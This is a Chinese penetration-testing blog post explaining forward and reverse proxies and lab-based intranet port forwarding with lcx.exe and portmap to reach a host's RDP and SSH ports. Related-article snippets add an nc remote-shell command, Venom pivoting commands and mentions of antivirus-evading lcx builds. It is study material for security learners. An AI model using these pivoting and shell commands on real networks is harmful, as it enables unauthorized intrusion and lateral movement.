代理内网穿透-Lcx.exe-venom-proxychains

已于 2022-04-25 18:57:23 修改
阅读量7.9k 收藏 25
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 网络安全 笔记 文章标签: web安全 安全
于 2022-04-24 21:32:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/124380934

代理


未经授权禁止任何渗透测试

面试常问

1.正向代理和反向代理的区别
2.正向代理和反向代理 常见出现位置

正向代理 客户端明确知道 存在一个中间代理服务器 反向代理 该代理对外表现就是一个服务器

一.概述

利用代理工具将内网的流量代理到本地进行访问或者利用工具将其他网段的流量转发到本地进行纵向渗透

msf 中 portfwd
将目标主机上的端口转发到msf所在的服务器上

代理的本质是socks协议.

二.代理分类:

1.正向代理

正向代理是将我们的流量转发给一个跳板,然后该跳板将我们发送给他的包转发给目标
比如我们国内访问***,直接访问访问不到,我们可以通过一个正向代理服务器,请求发到代理服务器,代理服务器能够访问**,这样由代理去取到返回数据,再返回给我们,这样我们就能访问
在这里插入图片描述
正向代理用途

访问原来无法访问的资源,如****,公司内网
出差访问公司内网 vpnclient 分配公司内网的ip地址
对客户端访问授权,上网进行认证
代理可以记录用户访问记录(上网行为管理),对外隐藏用户信息

xxxx 上网行为管理

反向代理

反向代理以代理服务器来处理来自网络上的连接请求,然后将请求转发到内部网络上的服务器,并将从内部服务器得到的结果返回给来自网络上的客户端,此时,代理服务器表现为一个服务器

在这里插入图片描述

反向代理的作用:

边界防火墙 nat
保证内网的安全,一定程度上阻止web攻击.
在大型网站中,通常将反向代理作为公网访问地址,而真正的Web服务器存在于内网之中.
负载均衡,通过反向代理服务器来优化网站的负载

三.Lcx.exe内网端口转发

在这里插入图片描述
在这里插入图片描述

步骤

bihuo 虚拟机 <=======> kali linux <=======> 物理机

物理机访问bihuo 虚拟机的3389端口 直接访问无法访问到

bihuo虚拟机: 主动将自身的3389端口的流量转发到kali linux 主机上的特定端口(11111)

kali linux 虚拟机:11111端口监听来自于bihuo虚拟机3389的流量 将11111端口接收到的流量转发到kali linux 的22222端口

物理机: 访问kali linux 的22222端口 就可以获得bihuo虚拟机的3389端口的流量

在这里插入图片描述

下载lcx – linux 版本 portmap

linux系统作为转发

  1. kali linux 虚拟机: 在11111端口监听来自于bihuo虚拟机3389的流量 将11111端口接收到的流量转发到kali linux 的22222端口

公网主机上执行:lcx.exe –listen 接收数据的端口 映射流量的端口,意思是监听公网主机本机的 11111端口请求,并将来自 11111 端口的请求传送给 22222 端口。

命令:

./portmap -m 2 -p1 11111 -p2 22222

在这里插入图片描述

  1. bihuo虚拟机: 主动将自身的3389端口的流量转发到kali linux 主机上的特定端口(11111)

内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口,意思是把内网主机的某端口转发到具有公网ip主机的 对应 端口。

开启3389
在这里插入图片描述

在这里插入图片描述
命令

lcx.exe -slave 192.168.0.142 1111 127.0.0.1 3389

在这里插入图片描述
3. 此时物理机直接访问:kaliIP:22222,即可转发到内网IP的3389
在这里插入图片描述
在这里插入图片描述

window系统转发流量

 kali linux <=======> bihuo 虚拟机<=======> 物理机

物理机访问 kali linux 虚拟机的22端口 直接访问无法访问到

kali linux虚拟机: 主动将自身的22端口的流量转发到bihuo虚拟机的特定端口(11111)

bihuo虚拟机: 在11111端口监听来自于kali linux虚拟机22的流量 将11111端口接收到的流量转发到bihuo虚拟机 的22222端口

物理机: 访问bihuo虚拟机的22222端口 就可以获得kali linux 虚拟机的22端口的流量
  1. bihuo虚拟机: 在11111端口监听来自于kali linux虚拟机22的流量 将11111端口接收到的流量转发到bihuo虚拟机 的22222端口

命令:

lcx.exe -listen 11111 22222

在这里插入图片描述
在这里插入图片描述

  1. kali linux虚拟机: 主动将自身的22端口的流量转发到bihuo虚拟机的特定端口(11111)

命令:

service ssh start  # 开启22端口

在这里插入图片描述
命令:

./portmap\ lcx -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.0.3 -p2 11111

在这里插入图片描述

  1. 物理机: 访问bihuo虚拟机的22222端口 就可以获得kali linux 虚拟机的22端口的流量
    访问

命令:

ssh [email protected] -p 22222

最低0.47元/天 解锁文章

200万优质内容无限畅学
lcx的使用-内网穿透
帅醉了的博客
04-24 4573
lcx有两个功能映射(slave)和转发(tran) 简单看个列子: 映射(slave) 第一步: 我在攻击机上执行此命令 lcx -listen 3333 2222 此命令表示我监听3333端口,并把3333端口映射到2222端口 第二步: 我在靶机上执行此命令: lcx -slave 172.168.172.133 3333 172.168.172.201 3389 此命令表示我使用sl...
HTTP代理穿透方法
02-22
HTTP代理穿透方法
内网穿透--LCX端口转发实验
qq_65150735的博客
08-03 515
内网穿透--LCX端口转发实验
免杀端口转发lcx使用说明:一款安全的网络数据间接访问工具
最新发布
gitblog_06769的博客
05-11 946
端口转发工具lcx使用说明:一款安全的网络数据间接访问工具 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全和渗透测试领域中,端口转发是一个常用的技术手段。今天,我们将为您介绍一款经过特殊处理的端口转发工具——lcx。它可以帮助用户在复杂的网络环境中实现数据端口的转发,从而间接访问网络数据。lcx的设计初衷是辅助网络安全学习和研究,严禁用于非法操作。 项目技术...
内网代理穿透
huangyongkang666的博客
03-31 3027
内网代理穿透 实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要介绍Termite对模拟内网进行操作,Termite 是EW(EarthWorm)的最新版 1.nc工具使用 windows中使用nc,需要安装nc.exe 靶机 nc.exe -l -p 4444 -t -e cmd.exe 攻击机 nc.exe 192.168.1.1 4444 linux中使用nc,见工具使用栏中的netcat使用博客 2.termite使用 ​ 一款极度小巧灵活的跳板
Venom代理工具使用--以三层代理为例
y920312的专栏
03-30 1917
利用虚拟机模拟多层网络,以多层代理渗透为例,描述代理工具Venom的使用测试过程,帮助渗透测试人员使用Venom工具轻松地将网络流量代理到多层内网,并管理代理节点。
http代理穿透
weixin_34267123的博客
07-16 359
2019独角兽企业重金招聘Python工程师标准>>> ...
lcx 通过端口转发实现内网穿透
qq_29566629的博客
03-02 506
背景 实验 先使用iptables确保kali和漏洞主机不能互通: iptables -I INPUT -s 10.1.1.134 -j DROP 在漏洞主机上执行lcx -slave 10.1.1.143 1122 127.0.0.1 3389 把自己3389端口上的流量转发到10.1.1.143的端口上 在公网主机143上执行lcx -listen 1122 3300 把从1122端口接收到的流量转发到3300端口,这时所有访问这台公网主机3300端口的流量都会直接到达漏洞主机的3389端口:
内网穿透--LCX+portmap转发实验
qq_65150735的博客
08-03 574
内网穿透--LCX+portmap转发实验
代理-穿透-转发
5L2g556F5ZWl77yf
08-24 982
文章目录frp手册代理类型SSH代理socks5代理NPSVenomshellsock5代理ngrockSSH 转发穿透正向转发 frp 手册 https://gofrp.org/docs/ 代理类型 类型 描述 tcp 单纯的 TCP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 udp 单纯的 UDP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 http 针对 HTTP 应用定制了一些额外的功能,例如修改 Host Header,增加鉴权。 https
Http代理穿透技术
blade2001的专栏
09-26 1624
穿透代理服务器编程  http://blog.csdn.net/snail8384/article/details/3613373 透过代理看世界 用VC++实现http代理 http://school.cnd8.com/c/jiaocheng/8706.htm Http代理穿透技术: http://hi.baidu.com/aebiz_wxp/item/1
浅谈http代理服务器的穿透
linlin003的专栏
09-14 1830
思路就是先用套接字连接代理服务器,然后给代理服务器发送http请求,访问远程服务器 代码如下(只是连接): //初使化服务器地址      local.sin_family=AF_INET;      local.sin_port=htons(8080);
免杀的lcx.exe
01-19
免杀的lcx.exe,要的速度哦,免杀的lcx.exe,要的速度哦,免杀的lcx.exe,要的速度哦,
lcx.exe软件 使用
12-28
lcx.exe 软件 使用下载 很强大的一个小工具
lcx.exe 2011.7.28 免杀版
07-28
lcx [option:] -listen <ConnectPort> <TransmitPort> -tran <ConnectPort> <TransmitHost> <TransmitPort> -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> =============== 2011.7.28 免杀 只要不)犯(贱 上传 这些东西一般还是比较持久的!!!
Venom工具的使用(内网渗透 多级代理
rang的博客
08-19 3632
在Moriarty Corp靶场下使用Venom工具穿透内网 工具说明:https://github.com/Dliv3/Venom 编译好的可执行文件:https://github.com/Dliv3/Venom/releases admin监听端口,agent发起连接: ./admin_linux_x64 -lport 9999 # 攻击机开启监听 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接 agent监
Venom使用及三层代理搭建
2301_81684021的博客
11-21 1228
Venom是一款专为渗透测试人员设计的多级魔法工具,基于Go语言开发
【渗透工具】内网多级代理工具Venom详细使用教程
TT小子的博客
06-28 2866
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
windows下的端口转发工具lcx.exe
aeaxea43的博客
11-17 2209
大名鼎鼎,可惜只收集到了windows下的版本。 http://traffic189.com/f-19.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值